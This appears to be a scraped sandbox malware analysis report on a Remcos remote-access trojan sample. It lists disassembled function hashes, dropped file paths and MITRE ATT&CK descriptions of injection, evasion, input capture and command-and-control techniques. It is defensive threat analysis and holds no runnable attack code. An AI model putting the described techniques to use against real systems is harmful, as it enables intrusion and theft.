Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e833814fc5a531daae6198ea8e5b852fb1b4eb53fdcbeb3b304496249026e553
Instruction ID: ddc21b02f84f309c5487098e6d8ecfb41d7f09dd911d8ac34d3e9c1ff6a45948
Opcode Fuzzy Hash: e833814fc5a531daae6198ea8e5b852fb1b4eb53fdcbeb3b304496249026e553
Instruction Fuzzy Hash: 87F028303013005FD7089A7A9898BAA3FD7AFC6350F1484BDE60ACB282CE758C4BC751

Function 0305F588 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8992447e9ed4bf325864321d5764a41ca73fa8260ab4c318a46fbd0ef2dc4b05
Instruction ID: 451d76ac1bb0a9d42b0e99510e17e775dc037dedcfcba3229cf45f7ef5d9af55
Opcode Fuzzy Hash: 8992447e9ed4bf325864321d5764a41ca73fa8260ab4c318a46fbd0ef2dc4b05
Instruction Fuzzy Hash: 29F0CD3131021057DB046A7EA85476A778BEBC5365F148079E60AC7385CD76DC4B8791

Function 0305BCF7 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5790b734f98664ba1edc269f9d6a5f68b0f34100cb624900be09ede0147d3fc1
Instruction ID: d2ea6713f5b6ee5fe6c5b673644acc4a2a7e4340ea18c81cbc437dca517d80cb
Opcode Fuzzy Hash: 5790b734f98664ba1edc269f9d6a5f68b0f34100cb624900be09ede0147d3fc1
Instruction Fuzzy Hash: 88F022702096944FE706AB68D4583AF7FA2DFC2314F0441AFD5469B396CE391809CBA1

Function 0305BD77 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a17268ac2288a6a7eb4d0089fc7838eadb47cf171144988186f399af003f5d1
Instruction ID: 49a8ce5b4c665a47c18553d43d800bb0a21cf7800a1609855b28c151c6e3c6f3
Opcode Fuzzy Hash: 3a17268ac2288a6a7eb4d0089fc7838eadb47cf171144988186f399af003f5d1
Instruction Fuzzy Hash: A3F05E705063144FC7A1DB79E4D87EA7FE1EF46350F0405AEE59ACB241DB3968858B60

Function 0305C162 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da0dfaaa7cd8e8a6b1aae9427977950ddc6c287cf3d760b8d10bf98cb68f4a8c
Instruction ID: e56ec0b228c6d2d8e9534d178684173ebe4f05d8c98ec1d57c3f9e15903077c3
Opcode Fuzzy Hash: da0dfaaa7cd8e8a6b1aae9427977950ddc6c287cf3d760b8d10bf98cb68f4a8c
Instruction Fuzzy Hash: 8CE0D82175B3940FD711E17D1C146FB6BE94DC30A070D01EBEC41CF252D8444C06C3A2

Function 0305BD08 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: def6818c05ef3d7eb6af4cf4a41dfec6299615588fcd240b6a4d7d7d25a7a634
Instruction ID: 2575f1cb385a2d3ed1b1779b4306af4614beb6a779b76c12cb35fcff42d2ad16
Opcode Fuzzy Hash: def6818c05ef3d7eb6af4cf4a41dfec6299615588fcd240b6a4d7d7d25a7a634
Instruction Fuzzy Hash: B7F027756046144FE705AB69D41C3EF77A6EFC1354F10816EDA065B384CE396C068BE0

Function 0305B592 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42e75b71145d06c8d7862e1eb321f95ca14ce954aa21cdc81be116580621d9a9
Instruction ID: 75fb258f090c6c303e45ac5264979709d1e2cfee5b14a4ae9ead1a8a73ebfbed
Opcode Fuzzy Hash: 42e75b71145d06c8d7862e1eb321f95ca14ce954aa21cdc81be116580621d9a9
Instruction Fuzzy Hash: 69F0823830A7A48BCB065775641C5AD3FA29FC6224F0905AED546CB243CA680C09C7A1

Function 0305E5E8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73099e9cad7388e9dc658325b4b5a4e0f0719280df641966183b4535d9107582
Instruction ID: b3df21e68ce4aad58933239cc89cb0ac72141f8f3ad96fe8b40292e513f95b81
Opcode Fuzzy Hash: 73099e9cad7388e9dc658325b4b5a4e0f0719280df641966183b4535d9107582
Instruction Fuzzy Hash: 78E0C226B0E2902B9B1AC03DA4205AB1FD34BD726032985BFE989CB246DC528C028390

Function 0305BD88 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c262726bb64312f1bc91c7a350227ee1a4a4d51fa230f13fc10d0809d2ba619
Instruction ID: 891c7f8c1bb917d402989c620ac5388a96c82458f9f94f2bb8bb044de4c84537
Opcode Fuzzy Hash: 7c262726bb64312f1bc91c7a350227ee1a4a4d51fa230f13fc10d0809d2ba619
Instruction Fuzzy Hash: 99F06D709013148FD7A0DBBAE49C3AA7BE9EF45310F00486DE55ED7240DF39A8808BA0

Function 0305FDDB Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cb4fe0a91fb47bcdf24be99b9895f3b521ab1849c005b19877923821f386bf2
Instruction ID: 15f7fb662d92c15a6720f08b32a9b83a0235bca53facc81f8fc952b806ebecec
Opcode Fuzzy Hash: 2cb4fe0a91fb47bcdf24be99b9895f3b521ab1849c005b19877923821f386bf2
Instruction Fuzzy Hash: 33E09270D0930A9FC741EFB9994159EFFF0AF46200B5481BBC949D7312E7764A428BE1

Function 0305B5A0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fc455d6acc618ce4a4cf25a5b0ebd59775b696cfc426da7877e026bee2c65b8
Instruction ID: 2095e33c6d5af2f1a93fd98f9e47dba2a620f0cf20107da975b89a557bc850b0
Opcode Fuzzy Hash: 4fc455d6acc618ce4a4cf25a5b0ebd59775b696cfc426da7877e026bee2c65b8
Instruction Fuzzy Hash: D0E0DF3930572887CB0927B6A41C2EE7A56EBC5724F04043DE90A87341CF780C0587E5

Function 0305C170 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baaf723c24fc7cf95fee2577534f2facadf1703d6db49ec10a2a01db38b899bf
Instruction ID: b1ed3e4c99b2ef7437c53fdffe5a4e60c58c6592630b449b0624b8062d537776
Opcode Fuzzy Hash: baaf723c24fc7cf95fee2577534f2facadf1703d6db49ec10a2a01db38b899bf
Instruction Fuzzy Hash: 4AD05E167423290B9554F0BE1C106BBB2DE8AC54A170D0136FE45CF341EC40DC02C3F6

Function 0305B360 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9f9e189d87f467213ba22cd6ae7a66b4585e652bc11c1e9f753c1e0fbac22d8
Instruction ID: 1c14343a2d54cc8f291364d488fc6bce6c645bbaa65bbad36eee3f824f20c37f
Opcode Fuzzy Hash: a9f9e189d87f467213ba22cd6ae7a66b4585e652bc11c1e9f753c1e0fbac22d8
Instruction Fuzzy Hash: F5E04834D0615E9BCB04DF69E4694FDBF70EB15200F4006ADDD47531A1DB61155ACF85

Function 0305B429 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d333cb51e3478d54a73189905ca5c6787b4473bf73175d5d3ce340d7c782302
Instruction ID: 31dddfb7821fb10130dd9e5609c29af6f5b43d9d2b13231b330ae4738742efaa
Opcode Fuzzy Hash: 7d333cb51e3478d54a73189905ca5c6787b4473bf73175d5d3ce340d7c782302
Instruction Fuzzy Hash: 8CE048349063488FCB14EFB8E4495ED7FF1EB05340B00456DE90597341DA715856CF81

Function 0305FDF0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 60bf0bb17c77618ee0745a79a5760b9c2d8f762ca90da8aa3964e1d4e2a09469
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 77D06270D0520D9F8780DFADD94156EFBF4EB58200F5085AA9919D7301E73156128BD1

Function 0305B370 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a112c5816b81ef89176ceff02c21df4a8fc82ed067406b394db82dcd3f4b620
Instruction ID: 1ecbf98a32d7d84347c267e6d6b5e6906a10de82b4f6a9dccbed97409766b180
Opcode Fuzzy Hash: 5a112c5816b81ef89176ceff02c21df4a8fc82ed067406b394db82dcd3f4b620
Instruction Fuzzy Hash: 55D0123480521D9BCB08EB55E82A4FE7B74EB11201F40046DDD07521D1DF20190ACEC5

Function 0305B438 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e2817462cbb459be69b561f7d897ad47333271813644f837659c439ce58f076
Instruction ID: 8fdd411679522c7f334ddd0781893a60e062674c6f414d61a146019f946b828e
Opcode Fuzzy Hash: 2e2817462cbb459be69b561f7d897ad47333271813644f837659c439ce58f076
Instruction Fuzzy Hash: 12D012749052089FC744EF65E44A57E7BB5E744301F004569ED0993380DA3068468BC1

Function 0305F958 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d4a04c6aea3e64eb8044c3c208c3726472c3f5fa32b4fc79b0e8e1157c95ab7
Instruction ID: f5bdb15f3b00e1ff2942d19d9135aee1b4a324a95c0f72a6a7042961bcd48569
Opcode Fuzzy Hash: 3d4a04c6aea3e64eb8044c3c208c3726472c3f5fa32b4fc79b0e8e1157c95ab7
Instruction Fuzzy Hash: A1C08C6024F3C10FC3134B3259106483FEE990319130E04EBE0C1CE0B3C418812CC32B

Function 076E1CB6 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274410271912.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_76e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78951cf45b08211a7793eec3f8c226e7a5b9f48fd624125c6c2144b76682e34e
Instruction ID: da1758af8895bdb23697d349f190bf0cc6efc624fd81b75c54628da71410b5e8
Opcode Fuzzy Hash: 78951cf45b08211a7793eec3f8c226e7a5b9f48fd624125c6c2144b76682e34e
Instruction Fuzzy Hash: 51A011B02000008BC200CA88C882820F320AB82208B28C0ACAA088F282CF23E8038A88

Non-executed Functions

Function 03057711 Relevance: .8, Instructions: 777COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0378e8f9bd42ad6501332f85c7af4c214bd7bfad822c656cf81ccec79bfddadb
Instruction ID: 9e3f6e6d13bae2769f6fcbc41122836589b0f5f02932c49c2417545e18852add
Opcode Fuzzy Hash: 0378e8f9bd42ad6501332f85c7af4c214bd7bfad822c656cf81ccec79bfddadb
Instruction Fuzzy Hash: F482E538A01218CFDB19DF60D895BADB772FF85305F5044A9DA062B390CB76AD8ACF51

Function 03054753 Relevance: 5.1, Strings: 4, Instructions: 116COMMON

Download Yara Rule

Strings

o^, xrefs: 03054792
o^, xrefs: 030547E2
o^, xrefs: 030547A2
o^, xrefs: 030547F2

Memory Dump Source

Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3050000_powershell.jbxd

Similarity

API ID:
String ID: o^$o^$o^$o^
API String ID: 0-2339528522
Opcode ID: 4f0b8bb51d862cc9e1d55f5f7b476e9ea5a1a8e911ca1aa171477ea5e884ef89
Instruction ID: b5ca185c90f804a40291f5c356e5f7391c7e3f9e2a7da4527c0fbac8fd96a6f0
Opcode Fuzzy Hash: 4f0b8bb51d862cc9e1d55f5f7b476e9ea5a1a8e911ca1aa171477ea5e884ef89
Instruction Fuzzy Hash: 7841C39680E7D11FD3074739A8A57867FB0AF632A5F0E00C7C4D4CF0A3E958985AC3A6

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report zR4aIjCuRs.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_6cf0e4ec34412705f7c7679452dd618a68a4ad_6bd5dc59_60d14e17-1202-42d6-adc8-8c198509b060\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_7999b5829bb6649a4591b7178c861d362cefd5f_6bd5dc59_c269668f-8d0f-4b43-9053-87429be6c60a\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A76.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B13.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B33.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB82.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC8C.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERECCC.tmp.xml

C:\ProgramData\remcos\logs.dat

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sffczvd.ngz.psm1

Windows Analysis Report
zR4aIjCuRs.exe

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
